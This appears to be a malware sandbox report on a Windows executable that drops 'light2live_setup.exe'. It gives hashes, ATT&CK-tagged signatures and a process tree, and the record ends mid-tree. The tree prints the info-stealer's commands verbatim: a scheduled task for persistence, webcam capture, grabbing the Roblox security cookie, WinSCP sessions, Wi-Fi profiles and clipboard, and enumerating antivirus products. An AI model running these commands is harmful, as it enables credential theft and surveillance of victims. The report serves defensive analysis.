20824f7516916057913e5b3be10c28aa877c2dc633ceeb4b37194f3c33722df6

Analysis

max time kernel
2s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
11/01/2024, 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64459a4abcf3bafd523327c46f498663.exe
Size

71.6MB
MD5

64459a4abcf3bafd523327c46f498663
SHA1

20b91b4aaf96ac34bcc7a80c9083846109c50c61
SHA256

20824f7516916057913e5b3be10c28aa877c2dc633ceeb4b37194f3c33722df6
SHA512

66bef9c6fddf89af9d0e7264e874cef7cd346ce6615c46ad2b924bf466cfd0133bc9e6fd1eaba629e063a48972b3230a5ea9399c621ac218e480fb0d4f199f16
SSDEEP

1572864:lA4/4rzOchPlW3thGYrCvgp6Y6GAS+vSW2G1hFlAnyeCo7:dkqcdlWdkeTOzS+vZ9/FlAyeCo7

Score

7^/10

Malware Config

Signatures

Loads dropped DLL 2 IoCs

pid	Process
3980	64459a4abcf3bafd523327c46f498663.exe
3980	64459a4abcf3bafd523327c46f498663.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	ipinfo.io
31	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
11820	WMIC.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
11160	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2596	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
8828	tasklist.exe
8684	tasklist.exe
8608	tasklist.exe
8444	tasklist.exe
8140	tasklist.exe
9568	tasklist.exe
9360	tasklist.exe
9308	tasklist.exe
8400	tasklist.exe
8364	tasklist.exe
8668	tasklist.exe
8572	tasklist.exe
8500	tasklist.exe
8332	tasklist.exe
8280	tasklist.exe
3032	tasklist.exe
8848	tasklist.exe
8816	tasklist.exe
8340	tasklist.exe
6940	tasklist.exe
9636	tasklist.exe
8764	tasklist.exe
8288	tasklist.exe
9132	tasklist.exe
8788	tasklist.exe
8628	tasklist.exe
9316	tasklist.exe
8392	tasklist.exe
8780	tasklist.exe
8372	tasklist.exe
8296	tasklist.exe
8268	tasklist.exe
8260	tasklist.exe
9280	tasklist.exe
8956	tasklist.exe
8892	tasklist.exe
9228	tasklist.exe
8936	tasklist.exe
8928	tasklist.exe
8884	tasklist.exe
8864	tasklist.exe
6516	tasklist.exe
8716	tasklist.exe
9716	tasklist.exe
8324	tasklist.exe
8700	tasklist.exe
8660	tasklist.exe
8644	tasklist.exe
9344	tasklist.exe
8544	tasklist.exe
8796	tasklist.exe
8636	tasklist.exe
8216	tasklist.exe
9412	tasklist.exe
9236	tasklist.exe
9104	tasklist.exe
8740	tasklist.exe
8536	tasklist.exe
8464	tasklist.exe
8452	tasklist.exe
8224	tasklist.exe
8972	tasklist.exe
9148	tasklist.exe
8876	tasklist.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3980	64459a4abcf3bafd523327c46f498663.exe

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\64459a4abcf3bafd523327c46f498663.exe
"C:\Users\Admin\AppData\Local\Temp\64459a4abcf3bafd523327c46f498663.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3980
- C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe
  C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe
  2⤵
  PID:3796
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get locale
    3⤵
    PID:4476
- - C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe
    "C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1948 --field-trial-handle=1728,8289633007532998005,96070963887476729,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3796 get ExecutablePath"
    3⤵
    PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    3⤵
    PID:11708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"
    3⤵
    PID:11700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:11692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"
    3⤵
    PID:11684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"
    3⤵
    PID:11676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    3⤵
    PID:12280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:11752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:11740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    3⤵
    PID:12184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
    3⤵
    PID:11888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      4⤵
      PID:11712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:12268
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:12232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\resources\app.asar.unpacked\bind\main.exe"
    3⤵
    PID:6404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    PID:6388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6012
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
      4⤵
      PID:8476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5996
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:7516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3488
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
      4⤵
      PID:8620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1068
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
      4⤵
      PID:10716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe
    "C:\Users\Admin\AppData\Local\Temp\2abEbOIpOGxVlu5APG5I9dPn01E\light2live_setup.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1728,8289633007532998005,96070963887476729,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "echo wlan"
    3⤵
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3796 get ExecutablePath"
    3⤵
    PID:11852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=3796 get ExecutablePath
      4⤵
      PID:11888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\light2live_setup.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"
    3⤵
    PID:10904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:6564
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
      4⤵
      PID:8100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:10644
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
      4⤵
      PID:7892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\fPTZadoagEULlERe8W9c\System\cam.3796_Admin"
    3⤵
    PID:11100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:11812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:9380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\fPTZadoagEULlERe8W9c\System\cam.3796_Admin.jpg"
    3⤵
    PID:8752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
    3⤵
    PID:9756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
    3⤵
    PID:11528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
    3⤵
    PID:8008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\Hqi3r9BMTLet_temp.ps1""
    3⤵
    PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
    3⤵
    PID:7140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
    3⤵
    PID:7956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:7112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
    3⤵
    PID:5148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
    3⤵
    PID:6652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:7380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:8664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:8524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
    3⤵
    PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:6732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
